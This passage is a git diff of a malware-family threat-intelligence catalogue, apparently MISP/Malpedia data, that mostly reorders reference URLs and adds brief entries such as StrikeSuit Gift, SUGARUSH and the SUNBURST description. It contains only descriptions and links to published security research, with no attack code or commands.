"https://arstechnica.com/information-technology/2018/04/tens-of-thousands-of-facebook-accounts-compromised-in-days-by-malware/", "https://blog.radware.com/security/2018/04/stresspaint-malware-campaign-targeting-facebook-credentials/" ], "synonyms": [], @@ -45751,8 +47887,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.strifewater_rat", "https://www.secureworks.com/blog/abrahams-ax-likely-linked-to-moses-staff", - "https://www.fortinet.com/blog/threat-research/guard-your-drive-from-driveguard", - "https://www.cybereason.com/blog/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations" + "https://www.cybereason.com/blog/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations", + "https://www.fortinet.com/blog/threat-research/guard-your-drive-from-driveguard" ], "synonyms": [], "type": [] @@ -45762,26 +47898,40 @@ }, { "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.strikesuit_gift", + "https://assets.stairwell.com/hubfs/Marketing-Assets/Stairwell-threat-report-The-origin-of-APT32-macros.pdf", + "https://ti.qianxin.com/blog/articles/english-version-of-new-approaches-utilized-by-oceanLotus-to-target-vietnamese-environmentalist/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ec2a5a29-a142-447c-85b9-ec47e78f9cb2", + "value": "StrikeSuit Gift" + }, + { + "description": "According to Mitre, StrongPity is an information stealing malware used by PROMETHIUM.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.strongpity", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/", + "https://anchorednarratives.substack.com/p/recover-your-files-with-strongpity", "https://0xthreatintel.medium.com/uncovering-apt-c-41-strongpity-backdoor-e7f9a7a076f4", "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", - "https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/", - "https://ti.qianxin.com/blog/articles/promethium-attack-activity-analysis-disguised-as-Winrar.exe/", + "https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/", "https://twitter.com/physicaldrive0/status/786293008278970368", "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", - "https://mp.weixin.qq.com/s/5No0TR4ECVPp_Xv4joXEBg", - "https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/", + "https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/", + "https://ti.qianxin.com/blog/articles/promethium-attack-activity-analysis-disguised-as-Winrar.exe/", "https://blogs.blackberry.com/en/2021/11/zebra2104", - "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", - "https://anchorednarratives.substack.com/p/recover-your-files-with-strongpity", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/", "https://anchorednarratives.substack.com/p/tracking-strongpity-with-yara", - "https://cybleinc.com/2020/12/31/strongpity-apt-extends-global-reach-with-new-infrastructure/", + "https://mp.weixin.qq.com/s/5No0TR4ECVPp_Xv4joXEBg", "https://blog.minerva-labs.com/a-new-strongpity-variant-hides-behind-notepad-installation", - "https://mp.weixin.qq.com/s/nQVUkIwkiQTj2pLaNYHeOA" + "https://mp.weixin.qq.com/s/nQVUkIwkiQTj2pLaNYHeOA", + "https://cybleinc.com/2020/12/31/strongpity-apt-extends-global-reach-with-new-infrastructure/", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html" ], "synonyms": [], "type": [] @@ -45794,24 +47944,24 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stuxnet", - "https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://www.codeproject.com/articles/246545/stuxnet-malware-analysis-paper", - "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", - "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf", - "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf", - "https://www.spiegel.de/netzwelt/web/die-erste-cyberwaffe-und-ihre-folgen-a-a0ed08c9-5080-4ac2-8518-ed69347dc147", - "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html", - "https://www.welivesecurity.com/media_files/white-papers/Stuxnet_Under_the_Microscope.pdf", - "https://fmmresearch.files.wordpress.com/2020/09/theemeraldconnectionreport_fmmr-2.pdf", "https://news.yahoo.com/revealed-how-a-secret-dutch-mole-aided-the-us-israeli-stuxnet-cyber-attack-on-iran-160026018.html", - "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf", "https://fmmresearch.wordpress.com/2020/09/28/the-emerald-connection-equationgroup-collaboration-with-stuxnet/", - "https://media.ccc.de/v/27c3-4245-en-adventures_in_analyzing_stuxnet", + "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf", + "https://www.welivesecurity.com/media_files/white-papers/Stuxnet_Under_the_Microscope.pdf", "https://medium.com/s2wlab/w3-may-en-story-of-the-week-code-signing-certificate-on-the-darkweb-94c7ec437001", - "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf" + "https://fmmresearch.files.wordpress.com/2020/09/theemeraldconnectionreport_fmmr-2.pdf", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf", + "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.spiegel.de/netzwelt/web/die-erste-cyberwaffe-und-ihre-folgen-a-a0ed08c9-5080-4ac2-8518-ed69347dc147", + "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf", + "https://media.ccc.de/v/27c3-4245-en-adventures_in_analyzing_stuxnet", + "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html", + "https://www.codeproject.com/articles/246545/stuxnet-malware-analysis-paper", + "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf", + "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf" ], "synonyms": [], "type": [] @@ -45824,10 +47974,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.subzero", - "https://www.focus.de/politik/vorab-aus-dem-focus-volle-kontrolle-ueber-zielcomputer-das-raetsel-um-die-spionage-app-fuehrt-ueber-wirecard-zu-putin_id_24442733.html", - "https://cdn.netzpolitik.org/wp-upload/2021/12/2018-08-28_DSIRF_Company-Profile-Gov.redacted.pdf", + "https://netzpolitik.org/2021/dsirf-wir-enthuellen-den-staatstrojaner-subzero-aus-oesterreich/", "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/", - "https://netzpolitik.org/2021/dsirf-wir-enthuellen-den-staatstrojaner-subzero-aus-oesterreich/" + "https://cdn.netzpolitik.org/wp-upload/2021/12/2018-08-28_DSIRF_Company-Profile-Gov.redacted.pdf", + "https://www.focus.de/politik/vorab-aus-dem-focus-volle-kontrolle-ueber-zielcomputer-das-raetsel-um-die-spionage-app-fuehrt-ueber-wirecard-zu-putin_id_24442733.html" ], "synonyms": [ "Corelump", @@ -45857,9 +48007,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sugar", + "https://medium.com/walmartglobaltech/sugar-ransomware-a-new-raas-a5d94d58d9fb", "https://cyware.com/news/newly-found-sugar-ransomware-is-now-being-offered-as-raas-641cfa69", - "https://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49", - "https://medium.com/walmartglobaltech/sugar-ransomware-a-new-raas-a5d94d58d9fb" + "https://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49" ], "synonyms": [], "type": [] @@ -45893,185 +48043,199 @@ "uuid": "129163aa-8539-40ee-a627-0ac6775697b5", "value": "SUGARRUSH" }, + { + "description": "According to Mandiant, SUGARUSH is a backdoor written to establish a connection with an embedded C2 and to execute CMD commands.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sugarush", + "https://www.mandiant.com/resources/suspected-iranian-actor-targeting-israeli-shipping" + ], + "synonyms": [], + "type": [] + }, + "uuid": "129163aa-8539-40ee-a627-0ac6775697b5", + "value": "SUGARUSH" + }, { "description": "FireEye describes SUNBURST as a trojanized SolarWinds digitally-signed component of the Orion software framework that contains a backdoor that communicates via HTTP to third party servers. After an initial dormant period of up to two weeks, it uses a DGA to generate specific subdomains for a set C&C domain. The backdoor retrieves and executes commands, that include the ability to transfer files, execute files, profile the system, reboot the machine, and disable system services. The C2 traffic to the malicious domains is designed to mimic normal SolarWinds API communications: Orion Improvement Program (OIP) protocol. The backdoor uses multiple obfuscated blocklists to identify forensic and anti-virus tools running as processes, services, and drivers. Multiple trojanzied updates were digitally signed from March - May 2020 and posted to the SolarWinds updates website.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sunburst", - "https://www.cyberark.com/resources/threat-research-blog/golden-saml-revisited-the-solorigate-connection", - "https://www.bleepingcomputer.com/news/security/the-solarwinds-cyberattack-the-hack-the-victims-and-what-we-know/", - "https://www.brighttalk.com/webcast/7451/462719", - "https://mp.weixin.qq.com/s/lh7y_KHUxag_-pcFBC7d0Q", + "https://therecord.media/solarwinds-says-fewer-than-100-customers-were-impacted-by-supply-chain-attack", + "https://www.fireeye.com/current-threats/sunburst-malware.html", + "https://twitter.com/ItsReallyNick/status/1338382939835478016", + "https://github.com/RedDrip7/SunBurst_DGA_Decode", + "https://www.cisa.gov/news/2021/01/05/joint-statement-federal-bureau-investigation-fbi-cybersecurity-and-infrastructure", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://securelist.com/sunburst-backdoor-kazuar/99981/", + "https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html", + "https://www.crowdstrike.com/blog/crowdstrike-launches-free-tool-to-identify-and-help-mitigate-risks-in-azure-active-directory/", + "https://www.gov.pl/web/diplomacy/statement-on-solar-winds-orion-cyberattacks", + "https://vxug.fakedoma.in/samples/Exotic/UNC2452/SolarWinds%20Breach/", + "https://www.microsoft.com/en-us/security/business/threat-protection/solorigate-detection-guidance", + "https://thenewstack.io/behind-the-scenes-of-the-sunburst-attack/", + "https://www.bleepingcomputer.com/news/security/autodesk-reveals-it-was-targeted-by-russian-solarwinds-hackers/", + "https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714", + "https://www.youtube.com/watch?v=LA-XE5Jy2kU", "https://www.microsoft.com/security/blog/2021/01/14/increasing-resilience-against-solorigate-and-other-sophisticated-attacks-with-microsoft-defender/", "https://mp.weixin.qq.com/s/UqXC1vovKUu97569LkYm2Q", - "https://notes.netbytesec.com/2021/01/solarwinds-attack-sunbursts-dll.html", - "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline", - "https://blog.prevasio.com/2020/12/sunburst-backdoor-part-iii-dga-security.html", - "https://securelist.com/sunburst-connecting-the-dots-in-the-dns-requests/99862/", - "https://msrc-blog.microsoft.com/2020/12/31/microsoft-internal-solorigate-investigation-update/", - "https://fidelissecurity.com/threatgeek/data-protection/ongoing-analysis-solarwinds-impact/", - "https://www.domaintools.com/resources/blog/change-in-perspective-on-the-utility-of-sunburst-related-network-indicators#", - "https://www.gov.pl/web/diplomacy/statement-on-solar-winds-orion-cyberattacks", + "https://us-cert.cisa.gov/ncas/alerts/aa21-008a", "https://netresec.com/?b=211cd21", - "https://www.cyborgsecurity.com/blog/sunburst-solarwinds-supply-chain-attack/", - "https://twitter.com/cybercdh/status/1338975171093336067", - "https://therecord.media/solarwinds-says-fewer-than-100-customers-were-impacted-by-supply-chain-attack", - "https://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html", - "https://www.bleepingcomputer.com/news/security/mimecast-links-security-breach-to-solarwinds-hackers/", + "https://www.sec.gov/ix?doc=/Archives/edgar/data/1739942/000173994221000076/swi-20210507.htm", + "https://www.wired.com/story/hacker-lexicon-what-is-a-supply-chain-attack/", + "https://www.domaintools.com/resources/blog/the-devils-in-the-details-sunburst-attribution", + "https://www.splunk.com/en_us/blog/security/sunburst-backdoor-detections-in-splunk.html", "https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf", - "https://vxug.fakedoma.in/samples/Exotic/UNC2452/SolarWinds%20Breach/", - "https://www.mfa.gov.lv/en/news/latest-news/67813-latvia-s-statement-following-the-announcement-by-the-united-states-of-actions-to-respond-to-the-russian-federation-s-destabilizing-activities", + "https://www.bleepingcomputer.com/news/security/the-solarwinds-cyberattack-the-hack-the-victims-and-what-we-know/", + "https://us-cert.cisa.gov/ncas/current-activity/2020/12/13/active-exploitation-solarwinds-software", + "https://twitter.com/Intel471Inc/status/1339233255741120513", + "https://zengo.com/ungilded-secrets-a-new-paradigm-for-key-security/", + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:MSIL/Solorigate.B!dha", + "https://netresec.com/?b=211f30f", "https://docs.google.com/spreadsheets/d/1u0_Df5OMsdzZcTkBDiaAtObbIOkMa5xbeXdKk_k0vWs", - "https://github.com/SentineLabs/SolarWinds_Countermeasures", - "https://techcommunity.microsoft.com/t5/azure-active-directory-identity/understanding-quot-solorigate-quot-s-identity-iocs-for-identity/ba-p/2007610", - "https://www.domaintools.com/resources/blog/continuous-eruption-further-analysis-of-the-solarwinds-supply-incident", - "https://prevasio.com/static/web/viewer.html?file=/static/Anatomy_Of_SolarWinds_Supply_Chain_Attack.pdf", - "https://www.fireeye.com/current-threats/sunburst-malware.html", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://www.bleepingcomputer.com/news/security/nasa-and-the-faa-were-also-breached-by-the-solarwinds-hackers/", - "https://medium.com/insomniacs/a-look-into-sunbursts-dga-ba4029193947", - "https://twitter.com/cybercdh/status/1338885244246765569", - "https://github.com/fireeye/Mandiant-Azure-AD-Investigator", "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/", - "https://www.domaintools.com/content/conceptualizing-a-continuum-of-cyber-threat-attribution.pdf", - "https://www.cadosecurity.com/post/responding-to-solarigate", - "https://blog.gigamon.com/2021/07/27/ghosts-on-the-wire-expanding-conceptions-of-network-anomalies/", - "https://twitter.com/ItsReallyNick/status/1338382939835478016", - "https://www.prevasio.io/blog/sunburst-backdoor-a-deeper-look-into-the-solarwinds-supply-chain-malware", - "https://blog.cloudflare.com/a-quirk-in-the-sunburst-dga-algorithm/", - "https://blog.cloudflare.com/solarwinds-orion-compromise-trend-data/", - "https://www.justice.gov/opa/pr/department-justice-statement-solarwinds-update", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-134a", - "https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/", - "https://corelight.blog/2020/12/15/finding-sunburst-backdoor-with-zeek-logs-and-corelight/", - "https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/", - "https://www.youtube.com/watch?v=mbGN1xqy1jY", - "https://www.trustedsec.com/blog/solarwinds-backdoor-sunburst-incident-response-playbook/?hss_channel=tw-403811306", - "https://unit42.paloaltonetworks.com/fireeye-solarstorm-sunburst/", - "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", - "https://www.cisa.gov/news/2021/01/05/joint-statement-federal-bureau-investigation-fbi-cybersecurity-and-infrastructure", - "https://www.brighttalk.com/webcast/7451/469525", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-command-control", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/additional-analysis-into-the-sunburst-backdoor/", - "https://www.mimecast.com/incident-report/", - "https://www.bleepingcomputer.com/news/security/fireeye-microsoft-create-kill-switch-for-solarwinds-backdoor/", - "https://github.com/RedDrip7/SunBurst_DGA_Decode", - "https://news.sophos.com/en-us/2020/12/14/solarwinds-playbook/", + "https://community.ibm.com/community/user/security/blogs/gladys-koskas1/2020/12/18/sunburst-indicator-detection-in-qradar", + "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515", + "https://www.consilium.europa.eu/en/press/press-releases/2021/04/15/declaration-by-the-high-representative-on-behalf-of-the-european-union-expressing-solidarity-with-the-united-states-on-the-impact-of-the-solarwinds-cyber-operation", + "https://blog.reversinglabs.com/blog/sunburst-the-next-level-of-stealth", + "https://blogs.microsoft.com/on-the-issues/2020/12/17/cyberattacks-cybersecurity-solarwinds-fireeye/", + "https://blog.truesec.com/2021/01/07/avoiding-supply-chain-attacks-similar-to-solarwinds-orions-sunburst", + "https://twitter.com/cybercdh/status/1338885244246765569", + "https://twitter.com/megabeets_/status/1339308801112027138", + "https://prevasio.com/static/web/viewer.html?file=/static/Anatomy_Of_SolarWinds_Supply_Chain_Attack.pdf", "https://gist.github.com/olafhartong/71ffdd4cab4b6acd5cbcd1a0691ff82f", "https://twitter.com/KimZetter/status/1338305089597964290", - "https://unit42.paloaltonetworks.com/strategically-aged-domain-detection/", - "https://www.prevasio.io/blog/sunburst-backdoor-part-ii-dga-the-list-of-victims", - "https://labs.sentinelone.com/solarwinds-sunburst-backdoor-inside-the-stealthy-apt-campaign/", - "https://vrieshd.medium.com/finding-sunburst-victims-and-targets-by-using-passivedns-osint-68f5704a3cdc", - "https://www.youtube.com/watch?v=GfbxHy6xnbA", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/how-a-device-to-cloud-architecture-defends-against-the-solarwinds-supply-chain-compromise/", - "https://www.trustedsec.com/blog/solarwinds-orion-and-unc2452-summary-and-recommendations/", - "https://us-cert.cisa.gov/remediating-apt-compromised-networks", + "https://www.domaintools.com/resources/blog/change-in-perspective-on-the-utility-of-sunburst-related-network-indicators#", + "https://www.prevasio.io/blog/sunburst-backdoor-a-deeper-look-into-the-solarwinds-supply-chain-malware", "https://www.cyborgsecurity.com/cyborg_labs/threat-hunt-deep-dives-solarwinds-supply-chain-compromise-solorigate-sunburst-backdoor/", - "https://r136a1.info/2022/06/18/using-dotnetfile-to-get-a-sunburst-timeline-for-intelligence-gathering/", - "https://www.ironnet.com/blog/a-closer-look-at-the-solarwinds/sunburst-malware-dga-or-dns-tunneling", - "https://www.netresec.com/?page=Blog&month=2020-12&post=Reassembling-Victim-Domain-Fragments-from-SUNBURST-DNS", - "https://netresec.com/?b=211f30f", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", - "https://www.4hou.com/posts/KzZR", - "https://www.comae.com/posts/sunburst-memory-analysis/", - "https://www.fireeye.com/blog/threat-research/2020/12/sunburst-additional-technical-details.html", - "https://blogs.microsoft.com/on-the-issues/2020/12/17/cyberattacks-cybersecurity-solarwinds-fireeye/", - "https://www.youtube.com/watch?v=dV2QTLSecpc", - "https://ics-cert.kaspersky.com/reports/2021/01/26/sunburst-industrial-victims/", - "https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/", - "https://github.com/github/codeql/tree/main/csharp/ql/src/experimental/Security%20Features/campaign", - "https://community.riskiq.com/article/9a515637", - "https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714", - "https://zengo.com/ungilded-secrets-a-new-paradigm-for-key-security/", - "https://www.fireeye.com/blog/products-and-services/2021/02/light-in-the-dark-hunting-for-sunburst.html", - "https://drive.google.com/file/d/1R79Q1oC18GmKK8FYBoYEt0vYF7SpsvQI/view", - "https://www.domaintools.com/resources/blog/the-devils-in-the-details-sunburst-attribution", - "https://www.consilium.europa.eu/en/press/press-releases/2021/04/15/declaration-by-the-high-representative-on-behalf-of-the-european-union-expressing-solidarity-with-the-united-states-on-the-impact-of-the-solarwinds-cyber-operation", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-sending-data", - "https://www.sec.gov/ix?doc=/Archives/edgar/data/1739942/000173994221000076/swi-20210507.htm", - "https://youtu.be/SW8kVkwDOrc?t=24706", - "https://www.mandiant.com/media/10916/download", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds", - "https://news.sophos.com/en-us/2020/12/21/how-sunburst-malware-does-defense-evasion/", - "https://blog.prevasio.com/2020/12/sunburst-backdoor-part-ii-dga-list-of.html", - "https://twitter.com/megabeets_/status/1339308801112027138", - "https://www.microsoft.com/en-us/security/business/threat-protection/solorigate-detection-guidance", - "https://blog.reversinglabs.com/blog/sunburst-the-next-level-of-stealth", - "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/", - "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515", - "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack", - "https://www.netresec.com/?page=Blog&month=2020-12&post=Extracting-Security-Products-from-SUNBURST-DNS-Beacons", - "https://netresec.com/?b=2113a6a", - "https://www.splunk.com/en_us/blog/security/smoothing-the-bumps-of-onboarding-threat-indicators-into-splunk-enterprise-security.html", - "https://www.accenture.com/us-en/blogs/cyber-defense/threat-intel-takeaways-solarigate", - "https://www.splunk.com/en_us/blog/security/sunburst-backdoor-detections-in-splunk.html", - "https://www.securonix.com/web/wp-content/uploads/2020/12/threat_research_solarwinds_sunburst_eclipser_supply_chain.pdf", - "https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/", - "https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more", - "https://github.com/cisagov/CHIRP", - "https://www.nato.int/cps/en/natolive/official_texts_183168.htm?selectedLocale=en", + "https://www.trustedsec.com/blog/solarwinds-orion-and-unc2452-summary-and-recommendations/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-attacks-stealthy-attackers-attempted-evade-detection", - "https://techcommunity.microsoft.com/t5/azure-active-directory-identity/azure-ad-workbook-to-help-you-assess-solorigate-risk/ba-p/2010718", - "https://us-cert.cisa.gov/ncas/alerts/aa21-077a", - "https://us-cert.cisa.gov/ncas/current-activity/2020/12/13/active-exploitation-solarwinds-software", - "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:MSIL/Solorigate.B!dha", - "https://www.mandiant.com/resources/unc2452-merged-into-apt29", - "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", - "https://research.checkpoint.com/2021/deep-into-the-sunburst-attack/", - "https://mp.weixin.qq.com/s/v-ekPFtVNZG1W7vWjcuVug", - "https://www.wired.com/story/hacker-lexicon-what-is-a-supply-chain-attack/", - "https://us-cert.cisa.gov/ncas/alerts/aa20-352a", - "https://www.aon.com/cyber-solutions/aon_cyber_labs/cloudy-with-a-chance-of-persistent-email-access/", - "https://www.youtube.com/watch?v=JoMwrkijTZ8", - "https://netresec.com/?b=212a6ad", - "https://www.youtube.com/watch?v=-Vsgmw2G4Wo", - "https://github.com/sophos-cybersecurity/solarwinds-threathunt", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a", - "https://blog.truesec.com/2020/12/17/the-solarwinds-orion-sunburst-supply-chain-attack/", - "https://twitter.com/0xrb/status/1339199268146442241", - "https://www.solarwinds.com/securityadvisory/faq", - "https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html", - "https://us-cert.cisa.gov/sites/default/files/publications/SolarWinds_and_AD-M365_Compromise-Detecting_APT_Activity_from_Known_TTPs.pdf", - "https://www.microsoft.com/security/blog/2021/02/25/microsoft-open-sources-codeql-queries-used-to-hunt-for-solorigate-activity/", - "https://github.com/fireeye/sunburst_countermeasures", - "https://www.mimecast.com/blog/important-security-update/", - "https://twitter.com/lordx64/status/1338526166051934213", - "https://community.ibm.com/community/user/security/blogs/gladys-koskas1/2020/12/18/sunburst-indicator-detection-in-qradar", - "https://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html", - "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html", - "https://blog.apiiro.com/detect-and-prevent-the-solarwinds-build-time-code-injection-attack", - "https://pastebin.com/6EDgCKxd", - "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", - "https://www.youtube.com/watch?v=LA-XE5Jy2kU", - "https://www.youtube.com/watch?v=cMauHTV-lJg", - "https://youtu.be/Ta_vatZ24Cs?t=59", - "https://mitre-attack.github.io/attack-navigator/#layerURL=https://raw.githubusercontent.com/center-for-threat-informed-defense/public-resources/master/solorigate/UNC2452.json", - "https://www.zscaler.com/blogs/security-research/hitchhikers-guide-solarwinds-incident-response", - "https://techcommunity.microsoft.com/t5/azure-sentinel/solarwinds-post-compromise-hunting-with-azure-sentinel/ba-p/1995095", - "https://www.cisa.gov/supply-chain-compromise", - "https://www.ironnet.com/blog/solarwinds/sunburst-behavioral-analytics-and-collective-defense-in-action", - "https://twitter.com/Intel471Inc/status/1339233255741120513", - "https://us-cert.cisa.gov/ncas/alerts/aa21-008a", - "https://www.elastic.co/blog/supervised-and-unsupervised-machine-learning-for-dga-detection", - "https://blog.prevasio.com/2020/12/sunburst-backdoor-deeper-look-into.html", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://www.solarwinds.com/securityadvisory", - "https://www.crowdstrike.com/blog/crowdstrike-launches-free-tool-to-identify-and-help-mitigate-risks-in-azure-active-directory/", - "https://go.recordedfuture.com/hubfs/reports/pov-2020-1230.pdf", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-unique-dga", - "https://www.bleepingcomputer.com/news/security/autodesk-reveals-it-was-targeted-by-russian-solarwinds-hackers/", - "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", - "https://threatconnect.com/blog/tracking-sunburst-related-activity-with-threatconnect-dashboards", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/how-a-device-to-cloud-architecture-defends-against-the-solarwinds-supply-chain-compromise/", "https://twitter.com/FireEye/status/1339295983583244302", + "https://www.youtube.com/watch?v=JoMwrkijTZ8", + "https://us-cert.cisa.gov/ncas/alerts/aa21-077a", + "https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/", + "https://blog.prevasio.com/2020/12/sunburst-backdoor-deeper-look-into.html", + "https://community.riskiq.com/article/9a515637", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-command-control", + "https://pastebin.com/6EDgCKxd", + "https://www.securonix.com/web/wp-content/uploads/2020/12/threat_research_solarwinds_sunburst_eclipser_supply_chain.pdf", + "https://news.sophos.com/en-us/2020/12/21/how-sunburst-malware-does-defense-evasion/", + "https://drive.google.com/file/d/1R79Q1oC18GmKK8FYBoYEt0vYF7SpsvQI/view", + "https://ics-cert.kaspersky.com/reports/2021/01/26/sunburst-industrial-victims/", + "https://cert.pl/posts/2023/04/kampania-szpiegowska-apt29/", + "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", + "https://www.4hou.com/posts/KzZR", + "https://www.prevasio.io/blog/sunburst-backdoor-part-ii-dga-the-list-of-victims", + "https://r136a1.info/2022/06/18/using-dotnetfile-to-get-a-sunburst-timeline-for-intelligence-gathering/", + "https://www.mfa.gov.lv/en/news/latest-news/67813-latvia-s-statement-following-the-announcement-by-the-united-states-of-actions-to-respond-to-the-russian-federation-s-destabilizing-activities", + "https://github.com/cisagov/CHIRP", + "https://twitter.com/cybercdh/status/1338975171093336067", + "https://www.youtube.com/watch?v=mbGN1xqy1jY", + "https://www.cyborgsecurity.com/blog/sunburst-solarwinds-supply-chain-attack/", + "https://go.recordedfuture.com/hubfs/reports/pov-2020-1230.pdf", + "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack", + "https://unit42.paloaltonetworks.com/strategically-aged-domain-detection/", + "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/", + "https://corelight.blog/2020/12/15/finding-sunburst-backdoor-with-zeek-logs-and-corelight/", + 